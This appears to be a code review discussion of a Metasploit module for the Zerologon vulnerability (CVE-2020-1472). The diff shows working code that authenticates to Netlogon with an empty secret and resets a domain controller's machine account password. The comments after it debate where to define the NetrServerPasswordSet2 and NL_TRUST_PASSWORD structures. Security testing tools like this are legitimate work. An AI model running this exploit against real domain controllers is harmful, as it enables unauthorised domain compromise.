modules/auxiliary/admin/dcerpc/cve_2020_1472_zerologon.rb

```diff
@@ -0,0 +1,218 @@
+    client_challenge = OpenSSL::Random.random_bytes(8)
+
+    response = netr_server_req_challenge(client_challenge: client_challenge)
+    session_key = Netlogon.calculate_session_key(EMPTY_SHARED_SECRET, client_challenge, response.server_challenge)
+    ppp = encrypt_netlogon_credential(client_challenge, session_key)
+
+    response = netr_server_authenticate3(client_credential: ppp)
+    fail_with(Failure::NoAccess, 'Failed to authenticate (the machine account password may not be empty)') unless response.status == 0
+
+    password = [datastore['PASSWORD']].pack('H*')
+
+    new_password_data = ("\x00" * (512 - password.length)) + password + [password.length].pack('V')
+    response = netr_server_password_set2(
+      authenticator: Netlogon::NetlogonAuthenticator.new(
+        credential: encrypt_netlogon_credential([ppp.unpack1('Q') + 10].pack('Q'), session_key),
+        timestamp: 10
+      ),
+      clear_new_password: encrypt_netlogon_credential(new_password_data, session_key)
+    )
+    status = response.last(4).unpack1('V')
+    fail_with(Failure::UnexpectedReply, "Password change failed with NT status: 0x#{status.to_s(16)}") unless status == 0
+
+    print_good("Successfully set machine account (#{datastore['NBNAME']}$) password")
+  end
+
+  def netr_server_authenticate3(client_credential: "\x00" * 8)
+    nrpc_call('NetrServerAuthenticate3',
+              primary_name: "\\\\#{datastore['NBNAME']}",
+              account_name: "#{datastore['NBNAME']}$",
+              secure_channel_type: SERVER_SECURE_CHANNEL,
+              computer_name: datastore['NBNAME'],
+              client_credential: client_credential,
+              flags: 0x212fffff)
+  end
+
+  def netr_server_password_set2(authenticator: nil, clear_new_password: "\x00" * 516)
+    authenticator ||= Netlogon::NetlogonAuthenticator.new(credential: "\x00" * 8, timestamp: 0)
+    request = NetrServerPasswordSet2Request.new(
+      primary_name: "\\\\#{datastore['NBNAME']}",
+      account_name: "#{datastore['NBNAME']}$",
+      secure_channel_type: SERVER_SECURE_CHANNEL,
+      computer_name: datastore['NBNAME'],
+      authenticator: authenticator,
+      clear_new_password: clear_new_password
+    )
+    dcerpc.call(request.opnum, request.to_binary_s)
+  end
+
+  def netr_server_req_challenge(client_challenge: "\x00" * 8)
+    nrpc_call('NetrServerReqChallenge',
+              primary_name: "\\\\#{datastore['NBNAME']}",
+              computer_name: datastore['NBNAME'],
+              client_challenge: client_challenge)
+  end
+
+  def nrpc_call(name, **kwargs)
+    request = Netlogon.const_get("#{name}Request").new(**kwargs)
+    Netlogon.const_get("#{name}Response").read(dcerpc.call(request.opnum, request.to_binary_s))
+  end
+
+  # [3.5.4.4.5 NetrServerPasswordSet2 (Opnum 30)](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nrpc/14b020a8-0bcf-4af5-ab72-cc92bc6b1d81)
+  class NetrServerPasswordSet2Request < BinData::Record
```

Comment:
I still think `NetrServerPasswordSet2Request` (and its counterpart `NetrServerPasswordSet2Response`) could be part of `ruby_smb`, even if it is not complete for now. I think confusing to have some data related to this structure in `ruby_smb` (`NETR_SERVER_PASSWORD_SET` opnum value and `NetlogonAuthenticator` structure) without having the actual structure.

Reply:
I considered that, but the structure would require the [`NL_TRUST_PASSWORD`](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nrpc/52d5bd86-5caf-47aa-aae4-cadf7339ec83) structure definition which looks simple enough until you read through the figures 4-6 and find out that I guess there's 3 different ways to store data in there depending on... I honestly don't know. I wanted to avoid putting a partial implementation of a structure in RubySMB so future travelers don't run into issues.

If you want, I could implement an incomplete `NL_TRUST_PASSWORD` type that just uses a fixed byte array and length field. It would require the user to properly format the data within it which seems like it should be the responsibility of BinData, but if you think it's fine I'd be happy to move it into RubySMB.

Reply:
> If you want, I could implement an incomplete NL_TRUST_PASSWORD type that just uses a fixed byte array and length field. It would require the user to properly format the data within it which seems like it should be the responsibility of BinData, but if you think it's fine I'd be happy to move it into RubySMB.

This sounds great! I think it will be very good like this.

So, after reading the documentation, `NL_TRUST_PASSWORD` is used for both **Computer account password** or **Domain trust password** (interdomain trust accounts). The structure would be:
- for Computer account password: `Data + Password + Length`
- for Domain trust password: `Data + PasswordVersion + Password + Length`
  - PasswordVersion is a [NL_PASSWORD_VERSION](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nrpc/cba0e87e-b91f-411b-9be8-6fd321e126b7) structure, which is composed of 3 ULONG fields

`NL_TRUST_PASSWORD` structure can be setup with a `choice` that select the proper `buffer` field based on a parameter, for example: `password_type` parameter, which could be `computer_account` or `domain_trust`.

Reply:
Alright I defined the `NetrServerPasswordSet2Response` structure and moved the request over into RubySMB. I completely skipped defining the `NL_TRUST_VERSION` structure since I didn't need it and wanted to avoid all of the testing that would be necessary with a functioning definition. Additionally, even if that structure were defined, the `NetrServerPasswordSet2Request#clear_new_password` field would still need to be defined as an array of bytes due to it being encrypted. That field now uses the new `NdrFixedByteArray` field with a set length of 516. In the future, I'd imagine we'd have a nice `NL_TRUST_VERSION` structure with an `#encrypt` helper function that would output 516 bytes to be placed in `NetrServerPasswordSet2Request#clear_new_password`.

Relevant commits are:
  * ruby_smb [5ca2d3f8](https://github.com/rapid7/ruby_smb/pull/164/commits/5ca2d3f8d475d95976198fc13f0509bdb8fb48be)
  * metasploit-framework [a810d37c](https://github.com/rapid7/metasploit-framework/pull/14151/commits/a810d37c47e31a6e76ad966467efccc01cd6f57e])

Reply:
That's perfectly fine for now. Thanks for updating this.